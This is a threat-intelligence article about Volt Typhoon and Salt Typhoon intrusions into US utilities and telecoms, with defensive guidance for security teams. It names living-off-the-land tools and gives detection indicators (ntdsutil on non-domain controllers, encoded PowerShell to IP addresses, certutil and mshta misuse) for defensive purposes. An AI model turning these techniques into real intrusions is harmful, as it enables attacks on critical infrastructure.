Volt Typhoon and Salt Typhoon: China's Pre-Positioned Hackers Are Inside US Power Grids and Telecoms

Two Chinese state-sponsored hacking groups have been quietly inside American critical infrastructure for years. Not stealing data. Not causing outages. Just waiting.

That is the conclusion from the FBI, CISA, NSA, and intelligence agencies across Five Eyes nations after an extended joint investigation. The groups — dubbed Volt Typhoon and Salt Typhoon by Microsoft and CrowdStrike respectively — represent the most serious confirmed penetration of US infrastructure by a foreign adversary since at least the Cold War.

In March 2026, with US-China tensions elevated following the Hormuz conflict and semiconductor export restrictions, the question of what these groups are positioned to do is no longer theoretical.

Volt Typhoon: Inside Power, Water, and Communications

Volt Typhoon (also tracked as Bronze Silhouette and Vanguard Panda) was first publicly attributed by Microsoft in May 2023. CISA advisory AA24-038A, published February 2024, confirmed that Volt Typhoon had maintained persistent access inside US critical infrastructure — including energy, water, communications, and transportation sectors — for at least five years.

FBI Director Christopher Wray testified to the House Select Committee on the Chinese Communist Party in January 2024: "China's hackers are positioning on American infrastructure in preparation to wreak havoc and cause real-world harm to American citizens and communities, if or when China decides the time has come to strike."

The targets are not financial. Volt Typhoon is not exfiltrating intellectual property or selling access on darknet markets. The targets are operational: the systems that keep the lights on, water flowing, and communications running.

What they compromised:

• Electric utilities in multiple US states (grid operational technology networks)
• Water treatment facilities (SCADA and ICS systems)
• Oil and natural gas pipelines (operational technology adjacent to control systems)
• Commercial satellite communications providers
• US military logistics contractors and port authorities

How they got in — "Living Off the Land":

The defining characteristic of Volt Typhoon is the absence of custom malware. The group uses legitimate system tools already present on compromised machines — Windows Management Instrumentation (WMI), PowerShell, ntdsutil, netsh — to blend in with normal administrative traffic. This is called "living off the land" (LOTL) and it makes detection extremely difficult.

No novel exploit. No zero-day. Just patient, methodical use of standard admin tools under stolen credentials. Volt Typhoon typically gains initial access through internet-facing devices — FortiGate firewalls, Cisco routers, NETGEAR appliances — that are unpatched or misconfigured. From there, they move laterally and establish persistence without ever deploying a traditional backdoor.

Salt Typhoon: Inside US Telecoms and the Wiretap System

Salt Typhoon (also tracked as Earth Estries and GhostEmperor) is a separate group with a different focus: telecommunications infrastructure. Where Volt Typhoon targets operational technology, Salt Typhoon targets the lawful intercept systems that US law enforcement uses to conduct court-ordered wiretaps.

In October 2024, the Wall Street Journal reported that Salt Typhoon had breached AT&T, Verizon, and Lumen Technologies. By November 2024, the FCC held an emergency closed-door meeting on the intrusions. The final confirmed count was eight major US telecoms breached — including T-Mobile.

The access Salt Typhoon gained was to CALEA (Communications Assistance for Law Enforcement Act) infrastructure — the backend systems that let law enforcement intercept communications under court order. This means Chinese intelligence potentially had access to a list of who US law enforcement was actively surveilling. The counterintelligence implications are severe: any Chinese assets or intermediaries under FBI surveillance could have been tipped off through the information obtained from these systems.

What Salt Typhoon accessed:

• Call metadata (who called whom, when, for how long) for millions of Americans
• A subset of actual call and message content for targets of interest
• The names and identities of US persons under active law enforcement surveillance
• Internal telecom network topology and routing infrastructure

The breach was not detected by the telecoms themselves. It was identified by an intelligence tip — suggesting Salt Typhoon was inside these networks for an extended period before discovery.

Why Pre-Positioning Matters More Than Immediate Damage

Both Volt Typhoon and Salt Typhoon appear to be operating under a doctrine of strategic patience. The goal is not to cause disruption today. The goal is to have the capability to cause disruption at a moment of geopolitical crisis — a Taiwan conflict, a trade war escalation, a military confrontation.

General Timothy Haugh, director of NSA and Cyber Command, said in congressional testimony that Volt Typhoon's positioning represents "pre-positioning for disruption or destruction" rather than espionage. This is a fundamentally different threat model than data theft.

The scenario US defense planners fear: China initiates military action against Taiwan, and simultaneously activates pre-positioned access to create blackouts, water outages, and communications disruptions inside the continental United States to distract from military response and erode public support for intervention.

This is not hypothetical. Russia demonstrated a version of this playbook in Ukraine — Sandworm pre-positioned in Ukrainian infrastructure before the 2022 invasion and used that access to take down power grids in the opening days of conflict.

The 2026 Context

The strategic environment has deteriorated since the initial disclosures. US-China relations in March 2026 are at their most adversarial since at least the Korean War era. The Hormuz conflict, semiconductor export restrictions on Chinese companies, and Congressional legislation treating China as a strategic competitor have all elevated tensions.

CISA issued a supplementary advisory in February 2026 noting that Volt Typhoon activity had intensified since mid-2025, with new indicators of compromise identified in the water and communications sectors. The advisory characterised the heightened activity as consistent with "pre-conflict positioning."

What Infrastructure and Security Teams Must Do

Patch internet-facing devices immediately. Volt Typhoon's most common initial access vector is unpatched edge devices. FortiGate, Cisco IOS, Citrix ADC, and NETGEAR routers with known CVEs published in 2023-2024 are the most common entry points. If you manage any of these, check patch levels today.

Audit for LOTL indicators. The CISA AA24-038A advisory includes detailed indicators of compromise and YARA rules. Key behavioural indicators include: ntdsutil running on non-domain controllers, unusual WMI subscriptions, PowerShell encoded command execution to IP addresses, and LOLBin usage (certutil, mshta, regsvr32) in unusual contexts.

Segment OT from IT networks. This is the single most effective control against lateral movement from IT networks into operational technology. Physical or logical air gaps with strict allow-list firewall rules between IT and OT. Many of the compromised utilities had insufficient segmentation.

Monitor for credential abuse. Volt Typhoon uses legitimate credentials extensively. Privileged Identity Management (PIM) solutions, Privileged Access Workstations (PAW), and anomalous login detection (unusual hours, unusual source IPs for service accounts) are essential.

For telecoms specifically: Audit CALEA infrastructure access logs. Salt Typhoon used legitimate access to lawful intercept systems — meaning the intrusion may look like normal law enforcement portal activity. Access reviews and anomaly detection on this infrastructure are critical.

The bottom line: Volt Typhoon and Salt Typhoon are not traditional hackers. They are the digital equivalent of special forces pre-positioned behind enemy lines. The infrastructure they have compromised may look normal today. Whether it stays that way depends on decisions made in Beijing, not Washington.